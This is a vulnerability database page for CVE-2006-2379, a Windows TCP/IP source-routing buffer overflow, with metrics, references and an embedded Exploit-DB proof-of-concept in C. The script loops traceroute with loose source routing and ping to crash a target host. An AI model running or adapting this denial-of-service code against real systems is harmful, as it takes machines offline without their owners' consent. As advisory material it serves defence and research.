CVE-2006-2379 : Detail

CVE-2006-2379

Overflow
94.73%V3
Network
2006-06-13
17h00 +00:00
2018-10-18
12h57 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Buffer overflow in the TCP/IP Protocol driver in Microsoft Windows 2000 SP4, XP SP1 and SP2, and Server 2003 SP1 and earlier allows remote attackers to execute arbitrary code via unknown vectors related to IP source routing.

CVE Informations

Related Weaknesses

CWE-ID Weakness Name Source
CWE-119 Improper Restriction of Operations within the Bounds of a Memory Buffer
The product performs operations on a memory buffer, but it reads from or writes to a memory location outside the buffer's intended boundary. This may result in read or write operations on unexpected memory locations that could be linked to other variables, data structures, or internal program data.

Metrics

Metrics Score Severity CVSS Vector Source
V2 9.3 AV:N/AC:M/Au:N/C:C/I:C/A:C [email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 1967

Publication date : 2006-06-29 22h00 +00:00
Author : Preddy
EDB Verified : Yes

/* #################################### # # Windows TCP/IP source routing poc # C version... # # by Preddy # # RootShell Security Group # # Shoutz 2: # # Jimmy and ByteCoder + # Rs Crew + # Rest of the world :D # # #################################### Compile: gcc win-tcpip-dos.c -o wintcpipdos Info: Published: 14.06.2006 Source: ANDREYMINAEV Type: remote Level: 9/10 Buffer overflow on ICMP packets with Loose Source and Record Route IP options. Short message translation: There are DoS conditions in Windows 2000 built-in NAT server. Tested configuration: Windows 2000 English Standard/Advanced Service Pack 4 + Update Rollup 1 for Service Pack 4 with NAT server enabled. While routing packets with options "Loose Source and Record Route" defined by RFC 791 through server, Windows crashes to BSOD with error in tcpip.sys or ntoskrnl.exe, or system hangs or system began instable work. It doesn't metter if packets are from internal or external networks. Use attached script to test vulnerability. On Windows 2003 problem doesn't present. It's also likely same problem to present in Windows 2000 + ISA 2000. Code execution is potentially possible. */ #include <stdio.h> #include <stdlib.h> #include <unistd.h> main(int argc, char *argv[]) { char dos_ip[255]; char mysystem[10]; char ping[20+1]; char trace[100]; if(argc != 3) { printf("\n\nWindows TCP/IP source routing Dos - by Preddy\n"); printf("Usage: %s <ip> <mysystem>\n", argv[0]); printf("Example: %s 127.0.0.1 linux\n", argv[0]); printf("Uses the ping and the traceroute utility on your system\n", argv[0]); printf("Should cause a BSOD on the remote system\n"); printf("More info: http://www.security.nnov.ru/Fnews753.html\n\n"); exit(1); } strcpy(dos_ip, argv[1]); strcpy(mysystem, argv[2]); if((strcmp (argv[2],"linux"))==0) { printf("\nTarget: %s\n", dos_ip); printf("MySystem: %s\n", mysystem); printf("Sending Payload...\n\n"); strcpy(ping, "ping -c 1 "); strncat(ping,argv[1],9); strcpy(trace, "traceroute -m 1 -g 0.0.0.0 "); strncat(trace,argv[1],9); while(1) { system(trace); system(ping); } } if((strcmp (argv[2],"windows"))==0) { printf("Target: %s\n", dos_ip); printf("MySystem: %s\n", mysystem); printf("Sending Payload...\n"); strcpy(ping, "ping -n 1 "); strncat(ping,argv[1],9); strcpy(trace, "tracert -h 1 -j 0.0.0.0 "); strncat(trace,argv[1],9); while(1) { system(trace); system(ping); } } } // milw0rm.com [2006-06-30]

Products Mentioned

Configuraton 0

Microsoft>>Windows_2000 >> Version *

Microsoft>>Windows_2000 >> Version *

Microsoft>>Windows_2000 >> Version *

Microsoft>>Windows_2000 >> Version *

Microsoft>>Windows_2000 >> Version *

Microsoft>>Windows_2003_server >> Version datacenter_64-bit

    Microsoft>>Windows_2003_server >> Version enterprise

      Microsoft>>Windows_2003_server >> Version enterprise

        Microsoft>>Windows_2003_server >> Version enterprise_64-bit

          Microsoft>>Windows_2003_server >> Version enterprise_64-bit

            Microsoft>>Windows_2003_server >> Version r2

              Microsoft>>Windows_2003_server >> Version r2

                Microsoft>>Windows_2003_server >> Version r2

                  Microsoft>>Windows_2003_server >> Version standard

                    Microsoft>>Windows_2003_server >> Version standard

                      Microsoft>>Windows_2003_server >> Version standard_64-bit

                        Microsoft>>Windows_2003_server >> Version web

                          Microsoft>>Windows_2003_server >> Version web

                            Microsoft>>Windows_nt >> Version 4.0

                              Microsoft>>Windows_nt >> Version 4.0

                              Microsoft>>Windows_nt >> Version 4.0

                              Microsoft>>Windows_nt >> Version 4.0

                              Microsoft>>Windows_nt >> Version 4.0

                                Microsoft>>Windows_nt >> Version 4.0

                                Microsoft>>Windows_nt >> Version 4.0

                                Microsoft>>Windows_nt >> Version 4.0

                                Microsoft>>Windows_nt >> Version 4.0

                                  Microsoft>>Windows_nt >> Version 4.0

                                  Microsoft>>Windows_nt >> Version 4.0

                                  Microsoft>>Windows_nt >> Version 4.0

                                  Microsoft>>Windows_nt >> Version 4.0

                                    Microsoft>>Windows_nt >> Version 4.0

                                    Microsoft>>Windows_nt >> Version 4.0

                                    Microsoft>>Windows_nt >> Version 4.0

                                    Microsoft>>Windows_nt >> Version 4.0

                                      Microsoft>>Windows_nt >> Version 4.0

                                      Microsoft>>Windows_nt >> Version 4.0

                                      Microsoft>>Windows_nt >> Version 4.0

                                      Microsoft>>Windows_nt >> Version 4.0

                                        Microsoft>>Windows_nt >> Version 4.0

                                        Microsoft>>Windows_nt >> Version 4.0

                                        Microsoft>>Windows_nt >> Version 4.0

                                        Microsoft>>Windows_nt >> Version 4.0

                                          Microsoft>>Windows_nt >> Version 4.0

                                          Microsoft>>Windows_nt >> Version 4.0

                                          Microsoft>>Windows_nt >> Version 4.0

                                          Microsoft>>Windows_nt >> Version 4.0

                                            Microsoft>>Windows_nt >> Version 4.0

                                            Microsoft>>Windows_nt >> Version 4.0

                                            Microsoft>>Windows_nt >> Version 4.0

                                            Microsoft>>Windows_xp >> Version *

                                              Microsoft>>Windows_xp >> Version *

                                              Microsoft>>Windows_xp >> Version *

                                              Microsoft>>Windows_xp >> Version *

                                              Microsoft>>Windows_xp >> Version *

                                              Microsoft>>Windows_xp >> Version *

                                              Microsoft>>Windows_xp >> Version *

                                              Microsoft>>Windows_xp >> Version *

                                              Microsoft>>Windows_xp >> Version *

                                              References

                                              http://www.securityfocus.com/bid/18374
                                              Tags : vdb-entry, x_refsource_BID
                                              http://secunia.com/advisories/20639
                                              Tags : third-party-advisory, x_refsource_SECUNIA
                                              http://www.kb.cert.org/vuls/id/722753
                                              Tags : third-party-advisory, x_refsource_CERT-VN
                                              http://www.us-cert.gov/cas/techalerts/TA06-164A.html
                                              Tags : third-party-advisory, x_refsource_CERT
                                              http://securitytracker.com/id?1016290
                                              Tags : vdb-entry, x_refsource_SECTRACK
                                              http://www.vupen.com/english/advisories/2006/2329
                                              Tags : vdb-entry, x_refsource_VUPEN
                                              http://www.osvdb.org/26433
                                              Tags : vdb-entry, x_refsource_OSVDB